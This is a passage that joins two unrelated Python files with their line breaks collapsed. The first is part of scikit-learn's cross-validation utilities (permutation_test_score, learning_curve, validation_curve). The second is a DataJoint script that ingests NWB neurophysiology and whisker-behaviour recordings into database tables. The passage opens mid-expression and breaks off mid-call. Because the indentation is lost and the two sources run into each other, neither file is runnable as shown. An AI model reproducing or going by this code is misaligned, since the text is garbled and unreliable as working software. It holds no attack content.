[_enforce_prediction_order( estimator.classes_[i_label], predictions[i_label], n_classes=len(set(y[:, i_label])), method=method) for i_label in range(len(predictions))] else: # A 2D y array should be a binary label indicator matrix n_classes = len(set(y)) if y.ndim == 1 else y.shape[1] predictions = _enforce_prediction_order( estimator.classes_, predictions, n_classes, method) return predictions def _enforce_prediction_order(classes, predictions, n_classes, method): """Ensure that prediction arrays have correct column order When doing cross-validation, if one or more classes are not present in the subset of data used for training, then the output prediction array might not have the same columns as other folds. Use the list of class names (assumed to be ints) to enforce the correct column order. Note that `classes` is the list of classes in this fold (a subset of the classes in the full training set) and `n_classes` is the number of classes in the full training set. """ if n_classes != len(classes): recommendation = ( 'To fix this, use a cross-validation ' 'technique resulting in properly ' 'stratified folds') warnings.warn('Number of classes in training fold ({}) does ' 'not match total number of classes ({}). ' 'Results may not be appropriate for your use case. ' '{}'.format(len(classes), n_classes, recommendation), RuntimeWarning) if method == 'decision_function': if (predictions.ndim == 2 and predictions.shape[1] != len(classes)): # This handles the case when the shape of predictions # does not match the number of classes used to train # it with. This case is found when sklearn.svm.SVC is # set to `decision_function_shape='ovo'`. raise ValueError('Output shape {} of {} does not match ' 'number of classes ({}) in fold. ' 'Irregular decision_function outputs ' 'are not currently supported by ' 'cross_val_predict'.format( predictions.shape, method, len(classes))) if len(classes) <= 2: # In this special case, `predictions` contains a 1D array. raise ValueError('Only {} class/es in training fold, but {} ' 'in overall dataset. This ' 'is not supported for decision_function ' 'with imbalanced folds. {}'.format( len(classes), n_classes, recommendation)) float_min = np.finfo(predictions.dtype).min default_values = {'decision_function': float_min, 'predict_log_proba': float_min, 'predict_proba': 0} predictions_for_all_classes = np.full((_num_samples(predictions), n_classes), default_values[method], dtype=predictions.dtype) predictions_for_all_classes[:, classes] = predictions predictions = predictions_for_all_classes return predictions def _check_is_permutation(indices, n_samples): """Check whether indices is a reordering of the array np.arange(n_samples) Parameters ---------- indices : ndarray int array to test n_samples : int number of expected elements Returns ------- is_partition : bool True iff sorted(indices) is np.arange(n) """ if len(indices) != n_samples: return False hit = np.zeros(n_samples, dtype=bool) hit[indices] = True if not np.all(hit): return False return True @_deprecate_positional_args def permutation_test_score(estimator, X, y, *, groups=None, cv=None, n_permutations=100, n_jobs=None, random_state=0, verbose=0, scoring=None, fit_params=None): """Evaluate the significance of a cross-validated score with permutations Permutes targets to generate 'randomized data' and compute the empirical p-value against the null hypothesis that features and targets are independent. The p-value represents the fraction of randomized data sets where the estimator performed as well or better than in the original data. A small p-value suggests that there is a real dependency between features and targets which has been used by the estimator to give good predictions. A large p-value may be due to lack of real dependency between features and targets or the estimator was not able to use the dependency to give good predictions. Read more in the :ref:`User Guide <permutation_test_score>`. Parameters ---------- estimator : estimator object implementing 'fit' The object to use to fit the data. X : array-like of shape at least 2D The data to fit. y : array-like of shape (n_samples,) or (n_samples, n_outputs) or None The target variable to try to predict in the case of supervised learning. groups : array-like of shape (n_samples,), default=None Labels to constrain permutation within groups, i.e. ``y`` values are permuted among samples with the same group identifier. When not specified, ``y`` values are permuted among all samples. When a grouped cross-validator is used, the group labels are also passed on to the ``split`` method of the cross-validator. The cross-validator uses them for grouping the samples while splitting the dataset into train/test set. scoring : str or callable, default=None A single str (see :ref:`scoring_parameter`) or a callable (see :ref:`scoring`) to evaluate the predictions on the test set. If None the estimator's score method is used. cv : int, cross-validation generator or an iterable, default=None Determines the cross-validation splitting strategy. Possible inputs for cv are: - None, to use the default 5-fold cross validation, - int, to specify the number of folds in a `(Stratified)KFold`, - :term:`CV splitter`, - An iterable yielding (train, test) splits as arrays of indices. For int/None inputs, if the estimator is a classifier and ``y`` is either binary or multiclass, :class:`StratifiedKFold` is used. In all other cases, :class:`KFold` is used. Refer :ref:`User Guide <cross_validation>` for the various cross-validation strategies that can be used here. .. versionchanged:: 0.22 ``cv`` default value if None changed from 3-fold to 5-fold. n_permutations : int, default=100 Number of times to permute ``y``. n_jobs : int, default=None Number of jobs to run in parallel. Training the estimator and computing the cross-validated score are parallelized over the permutations. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. See :term:`Glossary <n_jobs>` for more details. random_state : int, RandomState instance or None, default=0 Pass an int for reproducible output for permutation of ``y`` values among samples. See :term:`Glossary <random_state>`. verbose : int, default=0 The verbosity level. fit_params : dict, default=None Parameters to pass to the fit method of the estimator. .. versionadded:: 0.24 Returns ------- score : float The true score without permuting targets. permutation_scores : array of shape (n_permutations,) The scores obtained for each permutations. pvalue : float The p-value, which approximates the probability that the score would be obtained by chance. This is calculated as: `(C + 1) / (n_permutations + 1)` Where C is the number of permutations whose score >= the true score. The best possible p-value is 1/(n_permutations + 1), the worst is 1.0. Notes ----- This function implements Test 1 in: Ojala and Garriga. `Permutation Tests for Studying Classifier Performance <http://www.jmlr.org/papers/volume11/ojala10a/ojala10a.pdf>`_. The Journal of Machine Learning Research (2010) vol. 11 """ X, y, groups = indexable(X, y, groups) cv = check_cv(cv, y, classifier=is_classifier(estimator)) scorer = check_scoring(estimator, scoring=scoring) random_state = check_random_state(random_state) # We clone the estimator to make sure that all the folds are # independent, and that it is pickle-able. score = _permutation_test_score(clone(estimator), X, y, groups, cv, scorer, fit_params=fit_params) permutation_scores = Parallel(n_jobs=n_jobs, verbose=verbose)( delayed(_permutation_test_score)( clone(estimator), X, _shuffle(y, groups, random_state), groups, cv, scorer, fit_params=fit_params) for _ in range(n_permutations)) permutation_scores = np.array(permutation_scores) pvalue = (np.sum(permutation_scores >= score) + 1.0) / (n_permutations + 1) return score, permutation_scores, pvalue def _permutation_test_score(estimator, X, y, groups, cv, scorer, fit_params): """Auxiliary function for permutation_test_score""" # Adjust length of sample weights fit_params = fit_params if fit_params is not None else {} avg_score = [] for train, test in cv.split(X, y, groups): X_train, y_train = _safe_split(estimator, X, y, train) X_test, y_test = _safe_split(estimator, X, y, test, train) fit_params = _check_fit_params(X, fit_params, train) estimator.fit(X_train, y_train, **fit_params) avg_score.append(scorer(estimator, X_test, y_test)) return np.mean(avg_score) def _shuffle(y, groups, random_state): """Return a shuffled copy of y eventually shuffle among same groups.""" if groups is None: indices = random_state.permutation(len(y)) else: indices = np.arange(len(groups)) for group in np.unique(groups): this_mask = (groups == group) indices[this_mask] = random_state.permutation(indices[this_mask]) return _safe_indexing(y, indices) @_deprecate_positional_args def learning_curve(estimator, X, y, *, groups=None, train_sizes=np.linspace(0.1, 1.0, 5), cv=None, scoring=None, exploit_incremental_learning=False, n_jobs=None, pre_dispatch="all", verbose=0, shuffle=False, random_state=None, error_score=np.nan, return_times=False, fit_params=None): """Learning curve. Determines cross-validated training and test scores for different training set sizes. A cross-validation generator splits the whole dataset k times in training and test data. Subsets of the training set with varying sizes will be used to train the estimator and a score for each training subset size and the test set will be computed. Afterwards, the scores will be averaged over all k runs for each training subset size. Read more in the :ref:`User Guide <learning_curve>`. Parameters ---------- estimator : object type that implements the "fit" and "predict" methods An object of that type which is cloned for each validation. X : array-like of shape (n_samples, n_features) Training vector, where n_samples is the number of samples and n_features is the number of features. y : array-like of shape (n_samples,) or (n_samples, n_outputs) Target relative to X for classification or regression; None for unsupervised learning. groups : array-like of shape (n_samples,), default=None Group labels for the samples used while splitting the dataset into train/test set. Only used in conjunction with a "Group" :term:`cv` instance (e.g., :class:`GroupKFold`). train_sizes : array-like of shape (n_ticks,), \ default=np.linspace(0.1, 1.0, 5) Relative or absolute numbers of training examples that will be used to generate the learning curve. If the dtype is float, it is regarded as a fraction of the maximum size of the training set (that is determined by the selected validation method), i.e. it has to be within (0, 1]. Otherwise it is interpreted as absolute sizes of the training sets. Note that for classification the number of samples usually have to be big enough to contain at least one sample from each class. cv : int, cross-validation generator or an iterable, default=None Determines the cross-validation splitting strategy. Possible inputs for cv are: - None, to use the default 5-fold cross validation, - int, to specify the number of folds in a `(Stratified)KFold`, - :term:`CV splitter`, - An iterable yielding (train, test) splits as arrays of indices. For int/None inputs, if the estimator is a classifier and ``y`` is either binary or multiclass, :class:`StratifiedKFold` is used. In all other cases, :class:`KFold` is used. Refer :ref:`User Guide <cross_validation>` for the various cross-validation strategies that can be used here. .. versionchanged:: 0.22 ``cv`` default value if None changed from 3-fold to 5-fold. scoring : str or callable, default=None A str (see model evaluation documentation) or a scorer callable object / function with signature ``scorer(estimator, X, y)``. exploit_incremental_learning : bool, default=False If the estimator supports incremental learning, this will be used to speed up fitting for different training set sizes. n_jobs : int, default=None Number of jobs to run in parallel. Training the estimator and computing the score are parallelized over the different training and test sets. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. See :term:`Glossary <n_jobs>` for more details. pre_dispatch : int or str, default='all' Number of predispatched jobs for parallel execution (default is all). The option can reduce the allocated memory. The str can be an expression like '2*n_jobs'. verbose : int, default=0 Controls the verbosity: the higher, the more messages. shuffle : bool, default=False Whether to shuffle training data before taking prefixes of it based on``train_sizes``. random_state : int, RandomState instance or None, default=None Used when ``shuffle`` is True. Pass an int for reproducible output across multiple function calls. See :term:`Glossary <random_state>`. error_score : 'raise' or numeric, default=np.nan Value to assign to the score if an error occurs in estimator fitting. If set to 'raise', the error is raised. If a numeric value is given, FitFailedWarning is raised. .. versionadded:: 0.20 return_times : bool, default=False Whether to return the fit and score times. fit_params : dict, default=None Parameters to pass to the fit method of the estimator. .. versionadded:: 0.24 Returns ------- train_sizes_abs : array of shape (n_unique_ticks,) Numbers of training examples that has been used to generate the learning curve. Note that the number of ticks might be less than n_ticks because duplicate entries will be removed. train_scores : array of shape (n_ticks, n_cv_folds) Scores on training sets. test_scores : array of shape (n_ticks, n_cv_folds) Scores on test set. fit_times : array of shape (n_ticks, n_cv_folds) Times spent for fitting in seconds. Only present if ``return_times`` is True. score_times : array of shape (n_ticks, n_cv_folds) Times spent for scoring in seconds. Only present if ``return_times`` is True. Notes ----- See :ref:`examples/model_selection/plot_learning_curve.py <sphx_glr_auto_examples_model_selection_plot_learning_curve.py>` """ if exploit_incremental_learning and not hasattr(estimator, "partial_fit"): raise ValueError("An estimator must support the partial_fit interface " "to exploit incremental learning") X, y, groups = indexable(X, y, groups) cv = check_cv(cv, y, classifier=is_classifier(estimator)) # Store it as list as we will be iterating over the list multiple times cv_iter = list(cv.split(X, y, groups)) scorer = check_scoring(estimator, scoring=scoring) n_max_training_samples = len(cv_iter[0][0]) # Because the lengths of folds can be significantly different, it is # not guaranteed that we use all of the available training data when we # use the first 'n_max_training_samples' samples. train_sizes_abs = _translate_train_sizes(train_sizes, n_max_training_samples) n_unique_ticks = train_sizes_abs.shape[0] if verbose > 0: print("[learning_curve] Training set sizes: " + str(train_sizes_abs)) parallel = Parallel(n_jobs=n_jobs, pre_dispatch=pre_dispatch, verbose=verbose) if shuffle: rng = check_random_state(random_state) cv_iter = ((rng.permutation(train), test) for train, test in cv_iter) if exploit_incremental_learning: classes = np.unique(y) if is_classifier(estimator) else None out = parallel(delayed(_incremental_fit_estimator)( clone(estimator), X, y, classes, train, test, train_sizes_abs, scorer, verbose, return_times, error_score=error_score, fit_params=fit_params) for train, test in cv_iter ) out = np.asarray(out).transpose((2, 1, 0)) else: train_test_proportions = [] for train, test in cv_iter: for n_train_samples in train_sizes_abs: train_test_proportions.append((train[:n_train_samples], test)) results = parallel(delayed(_fit_and_score)( clone(estimator), X, y, scorer, train, test, verbose, parameters=None, fit_params=fit_params, return_train_score=True, error_score=error_score, return_times=return_times) for train, test in train_test_proportions ) results = _aggregate_score_dicts(results) train_scores = results["train_scores"].reshape(-1, n_unique_ticks).T test_scores = results["test_scores"].reshape(-1, n_unique_ticks).T out = [train_scores, test_scores] if return_times: fit_times = results["fit_time"].reshape(-1, n_unique_ticks).T score_times = results["score_time"].reshape(-1, n_unique_ticks).T out.extend([fit_times, score_times]) ret = train_sizes_abs, out[0], out[1] if return_times: ret = ret + (out[2], out[3]) return ret def _translate_train_sizes(train_sizes, n_max_training_samples): """Determine absolute sizes of training subsets and validate 'train_sizes'. Examples: _translate_train_sizes([0.5, 1.0], 10) -> [5, 10] _translate_train_sizes([5, 10], 10) -> [5, 10] Parameters ---------- train_sizes : array-like of shape (n_ticks,) Numbers of training examples that will be used to generate the learning curve. If the dtype is float, it is regarded as a fraction of 'n_max_training_samples', i.e. it has to be within (0, 1]. n_max_training_samples : int Maximum number of training samples (upper bound of 'train_sizes'). Returns ------- train_sizes_abs : array of shape (n_unique_ticks,) Numbers of training examples that will be used to generate the learning curve. Note that the number of ticks might be less than n_ticks because duplicate entries will be removed. """ train_sizes_abs = np.asarray(train_sizes) n_ticks = train_sizes_abs.shape[0] n_min_required_samples = np.min(train_sizes_abs) n_max_required_samples = np.max(train_sizes_abs) if np.issubdtype(train_sizes_abs.dtype, np.floating): if n_min_required_samples <= 0.0 or n_max_required_samples > 1.0: raise ValueError("train_sizes has been interpreted as fractions " "of the maximum number of training samples and " "must be within (0, 1], but is within [%f, %f]." % (n_min_required_samples, n_max_required_samples)) train_sizes_abs = (train_sizes_abs * n_max_training_samples).astype( dtype=int, copy=False) train_sizes_abs = np.clip(train_sizes_abs, 1, n_max_training_samples) else: if (n_min_required_samples <= 0 or n_max_required_samples > n_max_training_samples): raise ValueError("train_sizes has been interpreted as absolute " "numbers of training samples and must be within " "(0, %d], but is within [%d, %d]." % (n_max_training_samples, n_min_required_samples, n_max_required_samples)) train_sizes_abs = np.unique(train_sizes_abs) if n_ticks > train_sizes_abs.shape[0]: warnings.warn("Removed duplicate entries from 'train_sizes'. Number " "of ticks will be less than the size of " "'train_sizes' %d instead of %d)." % (train_sizes_abs.shape[0], n_ticks), RuntimeWarning) return train_sizes_abs def _incremental_fit_estimator(estimator, X, y, classes, train, test, train_sizes, scorer, verbose, return_times, error_score, fit_params): """Train estimator on training subsets incrementally and compute scores.""" train_scores, test_scores, fit_times, score_times = [], [], [], [] partitions = zip(train_sizes, np.split(train, train_sizes)[:-1]) if fit_params is None: fit_params = {} for n_train_samples, partial_train in partitions: train_subset = train[:n_train_samples] X_train, y_train = _safe_split(estimator, X, y, train_subset) X_partial_train, y_partial_train = _safe_split(estimator, X, y, partial_train) X_test, y_test = _safe_split(estimator, X, y, test, train_subset) start_fit = time.time() if y_partial_train is None: estimator.partial_fit(X_partial_train, classes=classes, **fit_params) else: estimator.partial_fit(X_partial_train, y_partial_train, classes=classes, **fit_params) fit_time = time.time() - start_fit fit_times.append(fit_time) start_score = time.time() test_scores.append( _score(estimator, X_test, y_test, scorer, error_score) ) train_scores.append( _score(estimator, X_train, y_train, scorer, error_score) ) score_time = time.time() - start_score score_times.append(score_time) ret = ((train_scores, test_scores, fit_times, score_times) if return_times else (train_scores, test_scores)) return np.array(ret).T @_deprecate_positional_args def validation_curve(estimator, X, y, *, param_name, param_range, groups=None, cv=None, scoring=None, n_jobs=None, pre_dispatch="all", verbose=0, error_score=np.nan, fit_params=None): """Validation curve. Determine training and test scores for varying parameter values. Compute scores for an estimator with different values of a specified parameter. This is similar to grid search with one parameter. However, this will also compute training scores and is merely a utility for plotting the results. Read more in the :ref:`User Guide <validation_curve>`. Parameters ---------- estimator : object type that implements the "fit" and "predict" methods An object of that type which is cloned for each validation. X : array-like of shape (n_samples, n_features) Training vector, where n_samples is the number of samples and n_features is the number of features. y : array-like of shape (n_samples,) or (n_samples, n_outputs) or None Target relative to X for classification or regression; None for unsupervised learning. param_name : str Name of the parameter that will be varied. param_range : array-like of shape (n_values,) The values of the parameter that will be evaluated. groups : array-like of shape (n_samples,), default=None Group labels for the samples used while splitting the dataset into train/test set. Only used in conjunction with a "Group" :term:`cv` instance (e.g., :class:`GroupKFold`). cv : int, cross-validation generator or an iterable, default=None Determines the cross-validation splitting strategy. Possible inputs for cv are: - None, to use the default 5-fold cross validation, - int, to specify the number of folds in a `(Stratified)KFold`, - :term:`CV splitter`, - An iterable yielding (train, test) splits as arrays of indices. For int/None inputs, if the estimator is a classifier and ``y`` is either binary or multiclass, :class:`StratifiedKFold` is used. In all other cases, :class:`KFold` is used. Refer :ref:`User Guide <cross_validation>` for the various cross-validation strategies that can be used here. .. versionchanged:: 0.22 ``cv`` default value if None changed from 3-fold to 5-fold. scoring : str or callable, default=None A str (see model evaluation documentation) or a scorer callable object / function with signature ``scorer(estimator, X, y)``. n_jobs : int, default=None Number of jobs to run in parallel. Training the estimator and computing the score are parallelized over the combinations of each parameter value and each cross-validation split. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. See :term:`Glossary <n_jobs>` for more details. pre_dispatch : int or str, default='all' Number of predispatched jobs for parallel execution (default is all). The option can reduce the allocated memory. The str can be an expression like '2*n_jobs'. verbose : int, default=0 Controls the verbosity: the higher, the more messages. fit_params : dict, default=None Parameters to pass to the fit method of the estimator. .. versionadded:: 0.24 error_score : 'raise' or numeric, default=np.nan Value to assign to the score if an error occurs in estimator fitting. If set to 'raise', the error is raised. If a numeric value is given, FitFailedWarning is raised. .. versionadded:: 0.20 Returns ------- train_scores : array of shape (n_ticks, n_cv_folds) Scores on training sets. test_scores : array of shape (n_ticks, n_cv_folds) Scores on test set. Notes ----- See :ref:`sphx_glr_auto_examples_model_selection_plot_validation_curve.py` """ X, y, groups = indexable(X, y, groups) cv = check_cv(cv, y, classifier=is_classifier(estimator)) scorer = check_scoring(estimator, scoring=scoring) parallel = Parallel(n_jobs=n_jobs, pre_dispatch=pre_dispatch, verbose=verbose) results = parallel(delayed(_fit_and_score)( clone(estimator), X, y, scorer, train, test, verbose, parameters={param_name: v}, fit_params=fit_params, return_train_score=True, error_score=error_score) # NOTE do not change order of iteration to allow one time cv splitters for train, test in cv.split(X, y, groups) for v in param_range) n_params = len(param_range) results = _aggregate_score_dicts(results) train_scores = results["train_scores"].reshape(-1, n_params).T test_scores = results["test_scores"].reshape(-1, n_params).T return train_scores, test_scores def _aggregate_score_dicts(scores): """Aggregate the list of dict to dict of np ndarray The aggregated output of _aggregate_score_dicts will be a list of dict of form [{'prec': 0.1, 'acc':1.0}, {'prec': 0.1, 'acc':1.0}, ...] Convert it to a dict of array {'prec': np.array([0.1 ...]), ...} Parameters ---------- scores : list of dict List of dicts of the scores for all scorers. This is a flat list, assumed originally to be of row major order. Example ------- >>> scores = [{'a': 1, 'b':10}, {'a': 2, 'b':2}, {'a': 3, 'b':3}, ... {'a': 10, 'b': 10}] # doctest: +SKIP >>> _aggregate_score_dicts(scores) # doctest: +SKIP {'a': array([1, 2, 3, 10]), 'b': array([10, 2, 3, 10])} """ return { key: np.asarray([score[key] for score in scores]) if isinstance(scores[0][key], (numbers.Number, np.ndarray)) else [score[key] for score in scores] for key in scores[0] }
import os import re import pathlib import h5py as h5 import numpy as np from decimal import Decimal from tqdm import tqdm import glob import datajoint as dj from pipeline import (reference, subject, acquisition, intracellular, behavior, stimulation, virus, utilities) path = pathlib.Path(dj.config['custom'].get('data_directory')).as_posix() fnames = np.hstack(glob.glob(os.path.join(dir_files[0], '*.nwb')) if len(dir_files[1]) == 0 and dir_files[0].find('VPM_silicon_probe') == -1 else [] for dir_files in os.walk(path)) for fname in fnames: print(f'Reading {fname}...') nwb = h5.File(fname, 'r') subject_info = {c: nwb['general']['subject'][c].value.decode('UTF-8') for c in ('subject_id', 'description', 'sex', 'species', 'weight', 'age', 'genotype')} # force subject_id to be lower-case for consistency subject_info['subject_id'] = subject_info['subject_id'].lower() # dob and sex subject_info['sex'] = subject_info['sex'][0].upper() dob_str = re.search('(?<=Date of birth:\s)(.*)', subject_info['description']) if utilities.parse_date(dob_str.group()) is not None: subject_info['date_of_birth'] = utilities.parse_date(dob_str.group()) # allele allele_str = re.search('(?<=Animal Strain:\s)(.*)', subject_info['description']).group() # extract the information related to animal allele allele_dict = {alias.lower(): allele for alias, allele in subject.AlleleAlias.fetch()} regex_str = '|'.join([re.escape(alias) for alias in allele_dict.keys()]) alleles = [allele_dict[s.lower()] for s in re.findall(regex_str, allele_str, re.I)] # source source_str = re.search('(?<=Animal source:\s)(.*)', subject_info['description']).group() # extract the information related to animal allele source_dict = {alias.lower(): source for alias, source in reference.AnimalSourceAlias.fetch()} regex_str = '|'.join([re.escape(alias) for alias in source_dict.keys()]) subject_info['animal_source'] = source_dict[re.search(regex_str, source_str, re.I).group().lower()] if re.search(regex_str, source_str, re.I) else 'N/A' with subject.Subject.connection.transaction: if subject_info not in subject.Subject.proj(): subject.Subject.insert1(subject_info, ignore_extra_fields = True) subject.Subject.Allele.insert((dict(subject_info, allele = k) for k in alleles), ignore_extra_fields = True) # ==================== session ==================== # -- session_time session_info = dict(subject_info, session_id=os.path.split(fname)[-1].replace('.nwb', ''), experiment_description=nwb['general']['experiment_description'].value.decode('UTF-8'), institution=nwb['general']['institution'].value.decode('UTF-8'), related_publications=nwb['general']['related_publications'].value.decode('UTF-8'), surgery=nwb['general']['surgery'].value.decode('UTF-8'), lab=nwb['general']['lab'].value.decode('UTF-8'), notes=nwb['general']['notes'].value.decode('UTF-8'), identifier=nwb['identifier'].value.decode('UTF-8'), session_note=nwb['session_description'].value.decode('UTF-8'), session_time=utilities.parse_date(nwb['general']['session_id'].value.decode('UTF-8'))) experimenters = nwb['general']['experimenter'].value.decode('UTF-8') experiment_types = re.split('Experiment type: ', session_info['notes'])[-1] experiment_types = re.split(',\s?', experiment_types) session_info['session_note'] = session_info.pop('session_note') + '; ' + session_info.pop('experiment_description') # experimenter and experiment type (possible multiple experimenters or types) experimenters = [experimenters] if np.array( experimenters).size <= 1 else experimenters # in case there's only 1 experimenter reference.Experimenter.insert(zip(experimenters), skip_duplicates = True) acquisition.ExperimentType.insert(zip(experiment_types), skip_duplicates=True) sess_key = {'subject_id': subject_info["subject_id"], 'session_time': session_info["session_time"], 'session_id': session_info['session_id']} with acquisition.Session.connection.transaction: if session_info not in acquisition.Session.proj(): acquisition.Session.insert1(session_info, ignore_extra_fields=True) acquisition.Session.Experimenter.insert((dict(session_info, experimenter=k) for k in experimenters), ignore_extra_fields=True) acquisition.Session.ExperimentType.insert((dict(session_info, experiment_type=k) for k in experiment_types), ignore_extra_fields=True) print(f'\nCreating Session - Subject: {subject_info['subject_id']} - Date: {session_info['session_time']}') # ==================== Intracellular ==================== # -- read data - intracellular_ephys ephys_name = list(nwb['general']['intracellular_ephys'])[0] ie_info = {c: nwb['general']['intracellular_ephys'][ephys_name][c].value.decode('UTF-8') for c in nwb['general']['intracellular_ephys'][ephys_name]} coord_ap_ml_dv = re.findall('\d+.\d+', ie_info['location']) hemisphere = 'left' # hardcoded here brain_location = {'brain_region': 'barrel cortex', # hardcoded here 'brain_subregion': 'N/A', 'cortical_layer': re.search('(?<=L)(\d)', session_info['session_note']).group(), 'hemisphere': hemisphere} reference.BrainLocation.insert1(brain_location, skip_duplicates = True) # -- ActionLocation action_location = dict(brain_location, coordinate_ref='bregma', # hardcoded here coordinate_ap=round(Decimal(coord_ap_ml_dv[0]), 2), coordinate_ml=round(Decimal(coord_ap_ml_dv[1]), 2), coordinate_dv=round(Decimal(coord_ap_ml_dv[2]) * Decimal('1e-3'), 2)) reference.ActionLocation.insert1(action_location, skip_duplicates = True) # -- Whole Cell Device reference.WholeCellDevice.insert1({'device_name': ie_info['device']}, skip_duplicates=True) # -- Cell - there should only be 1 unit for whole-cell recording unit = nwb['processing']['spike_times']['UnitTimes']['unit_list'].value[0].decode('UTF-8') unit_desc = nwb['processing']['spike_times']['UnitTimes'][unit]['unit_description'].value.decode('UTF-8') cell_key = dict({**sess_key, **action_location}, cell_type = re.search('|'.join(intracellular.CellType.fetch('cell_type')), unit_desc, re.I).group(), device_name = ie_info['device']) # determine if it is 'membrane_potential' or 'juxta_potential' for f in nwb['acquisition']['timeseries']: if re.search('potential', f): Vm_field = f break with intracellular.Cell.connection.transaction: if cell_key not in intracellular.Cell.proj(): intracellular.Cell.insert1(cell_key, ignore_extra_fields=True) intracellular.MembranePotential.insert1(dict( cell_key, membrane_potential=nwb['acquisition']['timeseries'][Vm_field]['data'].value, membrane_potential_timestamps=nwb['acquisition']['timeseries'][Vm_field]['timestamps'].value), ignore_extra_fields=True, allow_direct_insert=True, skip_duplicates=True) intracellular.CurrentInjection.insert1(dict( cell_key, current_injection=nwb['acquisition']['timeseries']['current']['data'].value, current_injection_timestamps=nwb['acquisition']['timeseries']['current']['timestamps'].value), ignore_extra_fields = True, allow_direct_insert = True, skip_duplicates=True) intracellular.UnitSpikeTimes.insert1(dict( cell_key, unit_id=int(re.search('\d+', unit).group()), spike_times=nwb['processing']['spike_times']['UnitTimes'][unit]['times'].value), ignore_extra_fields = True, allow_direct_insert = True, skip_duplicates=True) print('Ingest intracellular data') else: print(f'Cell exists: {fname}') # ==================== Behavior ==================== behavior.LickTrace.insert1(dict( sess_key, lick_trace=nwb['acquisition']['timeseries']['lick_trace']['data'].value, lick_trace_timestamps=nwb['acquisition']['timeseries']['lick_trace']['timestamps'].value), skip_duplicates=True, allow_direct_insert=True) principal_whisker, principal_whisker_num = nwb['analysis']['principal_whisker'].value[0].decode('UTF-8'), '1' whisker_timeseries = nwb['processing']['whisker']['BehavioralTimeSeries'] whisker_configs = ([wk.decode('UTF-8') for wk in nwb["general"]["whisker_configuration"].value] if nwb["general"]["whisker_configuration"].value.shape else [wk for wk in nwb["general"]["whisker_configuration"].value.decode('UTF-8').split(',')]) print(f'Whiskers: {whisker_configs} - Principal: {principal_whisker}') for whisker_config, whisker_num in zip(whisker_configs, set([re.search('\d', k).group() for k in whisker_timeseries])): whisker_key = dict(sess_key, whisker_config=whisker_config) principal_whisker_num = whisker_num if whisker_config == principal_whisker else principal_whisker_num if whisker_key not in behavior.Whisker.proj(): # ---- Extract behavior time-series and recondition b_tvec = whisker_timeseries['touch_onset_' + whisker_num]['timestamps'].value * 1e-3 # convert msec->second diff_btvec = np.diff(b_tvec) tr_break_idx = np.where(diff_btvec > 1)[0] tr_break_idx = tr_break_idx + 1 tr_break_idx = np.concatenate([[0], tr_break_idx, [len(b_tvec)]]) behavior_timestamps = np.hstack([(b_tvec[start:end] - b_tvec[start]) * 1e3 + b_tvec[start] for start, end in zip(tr_break_idx[:-1], tr_break_idx[1:])]) behavior.Whisker.insert1(dict( whisker_key, principal_whisker=(whisker_config == principal_whisker), distance_to_pole=whisker_timeseries['distance_to_pole_' + whisker_num]['data'].value.flatten(), touch_offset=whisker_timeseries['touch_offset_' + whisker_num]['data'].value.flatten(), touch_onset=whisker_timeseries['touch_onset_' + whisker_num]['data'].value.flatten(), whisker_angle=whisker_timeseries['whisker_angle_' + whisker_num]['data'].value.flatten(), whisker_curvature=whisker_timeseries['whisker_curvature_' + whisker_num]['data'].value.flatten(), behavior_timestamps= behavior_timestamps), skip_duplicates=True, allow_direct_insert=True) print(f'Ingest whisker data: {whisker_config} - Principal: {whisker_config == principal_whisker}') # ==================== Trials ==================== trial_resp_options = [k.decode('UTF-8') for k in nwb['analysis']['trial_type_string'].value.flatten()][:-1] # -- read trial-related info -- nwb['epochs'], nwb['analysis'], nwb['stimulus']['presentation']) trials = dict(trial_names=[tr for tr in nwb['epochs']], trial_type=[v['description'].value.decode('UTF-8') for v in nwb['epochs'].values()], start_times=[v['start_time'].value for v in nwb['epochs'].values()], stop_times=[v['stop_time'].value for v in nwb['epochs'].values()], good_trials=nwb['analysis']['good_trials'].value, trial_response=nwb['analysis']['trial_type_mat'].value, pole_pos_time=nwb['stimulus']['presentation']['pole_pos']['timestamps'].value, pole_pos=nwb['stimulus']['presentation']['pole_pos']['data'].value, pole_in_times=nwb['stimulus']['presentation']['pole_in']['timestamps'].value, pole_out_times=nwb['stimulus']['presentation']['pole_out']['timestamps'].value) lick_times = (nwb['acquisition']['timeseries']['lick_trace']['data'].value * (nwb['acquisition']['timeseries']['lick_trace']['timestamps'].value)) lick_times = lick_times[lick_times != 0] touch_times = (nwb['processing']['whisker']['BehavioralTimeSeries']['touch_onset_' + principal_whisker_num]['data'].value.flatten() * nwb['processing']['whisker']['BehavioralTimeSeries']['touch_onset_' + principal_whisker_num]['timestamps'].value.flatten()) touch_times = touch_times[touch_times != 0] * 1e-3 # convert ms -> s (behav data timestamps are in millisecond) # form new key-values pair and insert key trial_set = dict(sess_key, trial_counts=len(trials['trial_names'])) if trial_set not in acquisition.TrialSet.proj(): print(f'Ingest trial information\n') acquisition.TrialSet.insert1(trial_set, allow_direct_insert=True) for idx, trial_id in tqdm(enumerate(trials['trial_names'])): trial_key = dict(trial_set, trial_id=int(re.search('\d+', trial_id).group())) trial_detail = dict(start_time=trials['start_times'][idx], stop_time=trials['stop_times'][idx], trial_is_good=True if trials['good_trials'].flatten()[idx] == 1 else False, trial_type=re.match('Go|Nogo', trials['trial_type'][idx]).group(), trial_stim_present=True if trials['trial_response'][idx, -1] == 1 else False, trial_response=trial_resp_options[np.where(trials['trial_response'][idx, :-1])[0][0]], pole_position=trials['pole_pos'][idx]) # insert acquisition.TrialSet.Trial.insert1({**trial_key, **trial_detail}, ignore_extra_fields=True, skip_duplicates=True, allow_direct_insert=True) # ======== Now add trial event timing to the EventTime part table ==== # -- events timing trial_lick_times = lick_times[np.logical_and(lick_times > trial_detail['start_time'], lick_times < trial_detail['stop_time'])] trial_touch_times = touch_times[np.logical_and(touch_times > trial_detail['start_time'], touch_times < trial_detail['stop_time'])] events = dict(trial_start=0, trial_stop=trial_detail['stop_time'] - trial_detail['start_time'], pole_in=trials['pole_in_times'][idx] - trial_detail['start_time'], pole_out=trials['pole_out_times'][idx] - trial_detail['start_time'], pole_pos=trials['pole_pos_time'][idx] - trial_detail['start_time'], first_lick=trial_lick_times[0] - trial_detail['start_time'] if trial_lick_times.size else np.nan, first_touch=trial_touch_times[0] - trial_detail['start_time'] if trial_touch_times.size else np.nan) acquisition.TrialSet.EventTime.insert((dict(trial_key, trial_event=k, event_time=v) for k, v in events.items()), 